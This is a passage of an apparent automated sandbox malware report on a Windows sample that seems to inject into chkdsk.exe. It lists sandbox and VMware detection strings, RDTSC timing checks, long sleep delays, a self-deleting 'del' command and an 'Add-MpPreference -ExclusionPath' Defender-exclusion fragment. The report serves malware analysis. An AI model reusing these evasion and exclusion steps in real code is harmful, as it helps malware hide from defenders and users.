          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA5C52 pushad ; ret 10_2_04AA5C5A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB7D5 push eax; ret 10_2_04AAB828
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB88C push eax; ret 10_2_04AAB892
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB82B push eax; ret 10_2_04AAB892
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB822 push eax; ret 10_2_04AAB828
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAA10B push edi; retf 10_2_04AAA10C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA9178 push ebp; iretd 10_2_04AA917B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAA2A7 push ebx; retf 10_2_04AAA2AA
          Source: initial sampleStatic PE information: section name: .text entropy: 7.78260076892

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GV8EJooYMIgEnEk.exe PID: 6024, type: MEMORYSTR
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004A98604 second address: 0000000004A9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004A9899E second address: 0000000004A989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 4632Thread sleep time: -35216s >= -30000s
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 5632Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5248Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004088D0 rdtsc 3_2_004088D0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 9.5 %
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread delayed: delay time: 35216
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.384317833.00000000047D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h]10_2_04E06CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E414FB mov eax, dword ptr fs:[00000030h]10_2_04E414FB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58CD6 mov eax, dword ptr fs:[00000030h]10_2_04E58CD6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9849B mov eax, dword ptr fs:[00000030h]10_2_04D9849B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA44B mov eax, dword ptr fs:[00000030h]10_2_04DBA44B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h]10_2_04E1C450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA746D mov eax, dword ptr fs:[00000030h]10_2_04DA746D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h]10_2_04E5740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]10_2_04E06C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBBC2C mov eax, dword ptr fs:[00000030h]10_2_04DBBC2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]10_2_04E4FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E38DF1 mov eax, dword ptr fs:[00000030h]10_2_04E38DF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]10_2_04E06DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov ecx, dword ptr fs:[00000030h]10_2_04E06DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h]10_2_04D9D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h]10_2_04DBFD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h]10_2_04E505AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]10_2_04D82D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]10_2_04DB2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]10_2_04DB1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]10_2_04DB1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]10_2_04DB1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB35A1 mov eax, dword ptr fs:[00000030h]10_2_04DB35A1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA7D50 mov eax, dword ptr fs:[00000030h]10_2_04DA7D50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC3D43 mov eax, dword ptr fs:[00000030h]10_2_04DC3D43
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03540 mov eax, dword ptr fs:[00000030h]10_2_04E03540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h]10_2_04DAC577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h]10_2_04DAC577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58D34 mov eax, dword ptr fs:[00000030h]10_2_04E58D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E0A537 mov eax, dword ptr fs:[00000030h]10_2_04E0A537
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4E539 mov eax, dword ptr fs:[00000030h]10_2_04E4E539
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]10_2_04DB4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]10_2_04DB4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]10_2_04DB4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AD30 mov eax, dword ptr fs:[00000030h]10_2_04D8AD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB36CC mov eax, dword ptr fs:[00000030h]10_2_04DB36CC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC8EC7 mov eax, dword ptr fs:[00000030h]10_2_04DC8EC7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3FEC0 mov eax, dword ptr fs:[00000030h]10_2_04E3FEC0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58ED6 mov eax, dword ptr fs:[00000030h]10_2_04E58ED6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB16E0 mov ecx, dword ptr fs:[00000030h]10_2_04DB16E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D976E2 mov eax, dword ptr fs:[00000030h]10_2_04D976E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]10_2_04E50EA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]10_2_04E50EA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]10_2_04E50EA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E046A7 mov eax, dword ptr fs:[00000030h]10_2_04E046A7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FE87 mov eax, dword ptr fs:[00000030h]10_2_04E1FE87
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h]10_2_04E4AE44
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h]10_2_04E4AE44
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9766D mov eax, dword ptr fs:[00000030h]10_2_04D9766D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h]10_2_04DBA61C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h]10_2_04DBA61C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]10_2_04D8C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]10_2_04D8C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]10_2_04D8C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB8E00 mov eax, dword ptr fs:[00000030h]10_2_04DB8E00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3FE3F mov eax, dword ptr fs:[00000030h]10_2_04E3FE3F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41608 mov eax, dword ptr fs:[00000030h]10_2_04E41608
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8E620 mov eax, dword ptr fs:[00000030h]10_2_04D8E620
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC37F5 mov eax, dword ptr fs:[00000030h]10_2_04DC37F5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D98794 mov eax, dword ptr fs:[00000030h]10_2_04D98794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]10_2_04E07794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]10_2_04E07794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]10_2_04E07794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58F6A mov eax, dword ptr fs:[00000030h]10_2_04E58F6A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9EF40 mov eax, dword ptr fs:[00000030h]10_2_04D9EF40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9FF60 mov eax, dword ptr fs:[00000030h]10_2_04D9FF60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAF716 mov eax, dword ptr fs:[00000030h]10_2_04DAF716
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h]10_2_04DBA70E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h]10_2_04DBA70E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h]10_2_04E5070D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h]10_2_04E5070D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBE730 mov eax, dword ptr fs:[00000030h]10_2_04DBE730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h]10_2_04E1FF10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h]10_2_04E1FF10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h]10_2_04D84F2E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h]10_2_04D84F2E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov ecx, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D858EC mov eax, dword ptr fs:[00000030h]10_2_04D858EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89080 mov eax, dword ptr fs:[00000030h]10_2_04D89080
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov ecx, dword ptr fs:[00000030h]10_2_04DBF0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h]10_2_04DBF0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h]10_2_04DBF0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h]10_2_04E03884
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h]10_2_04E03884
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC90AF mov eax, dword ptr fs:[00000030h]10_2_04DC90AF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h]10_2_04DA0050
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h]10_2_04DA0050
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E51074 mov eax, dword ptr fs:[00000030h]10_2_04E51074
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E42073 mov eax, dword ptr fs:[00000030h]10_2_04E42073
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h]10_2_04E54015
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h]10_2_04E54015
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]10_2_04D9B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]10_2_04D9B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]10_2_04D9B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]10_2_04D9B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]10_2_04E07016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]10_2_04E07016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]10_2_04E07016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E141E8 mov eax, dword ptr fs:[00000030h]10_2_04E141E8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]10_2_04D8B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]10_2_04D8B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]10_2_04D8B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E069A6 mov eax, dword ptr fs:[00000030h]10_2_04E069A6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2990 mov eax, dword ptr fs:[00000030h]10_2_04DB2990
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC182 mov eax, dword ptr fs:[00000030h]10_2_04DAC182
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA185 mov eax, dword ptr fs:[00000030h]10_2_04DBA185
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]10_2_04E051BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]10_2_04E051BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]10_2_04E051BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]10_2_04E051BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h]10_2_04DB61A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h]10_2_04DB61A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h]10_2_04DAB944
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h]10_2_04DAB944
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h]10_2_04D8B171
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h]10_2_04D8B171
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C962 mov eax, dword ptr fs:[00000030h]10_2_04D8C962
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]10_2_04D89100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]10_2_04D89100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]10_2_04D89100
